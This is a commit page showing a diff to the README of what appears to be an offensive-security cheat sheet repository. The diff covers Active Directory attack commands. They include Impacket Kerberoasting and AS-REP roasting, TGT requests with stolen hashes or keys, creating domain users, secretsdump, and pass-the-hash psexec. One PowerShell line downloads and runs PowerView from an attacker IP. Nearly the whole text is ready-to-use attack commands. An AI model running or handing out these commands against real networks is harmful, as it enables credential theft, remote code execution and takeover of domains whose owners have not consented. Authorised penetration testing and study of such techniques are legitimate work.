kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-06 10:56:58 -04:00
committed by GitHub
parent 2f8536fc88
commit f718feded7
1 changed files with 3 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
README.md
View File

@@ -670,16 +670,11 @@ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN
# ASREP ROAST # ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# Request the TGT with hash # Request the TGT with hash, AES key, or password
python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH} python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH}
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY} python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY}
# Request the TGT with password
python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD} python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD}
# Bloodhound # Bloodhound
@@ -693,6 +688,7 @@ net user {USERNAME} {PASSWORD} /add /domain
# Add user to group # Add user to group
net group "{GROUP}" {USERNAME} /add net group "{GROUP}" {USERNAME} /add
# Powerview example
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1") IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass) $cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
@@ -703,7 +699,7 @@ sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{
# PSEXEC # PSEXEC
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS} sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py {USERNAME}:{PASSWORD}@{IP ADDRESS}
``` ```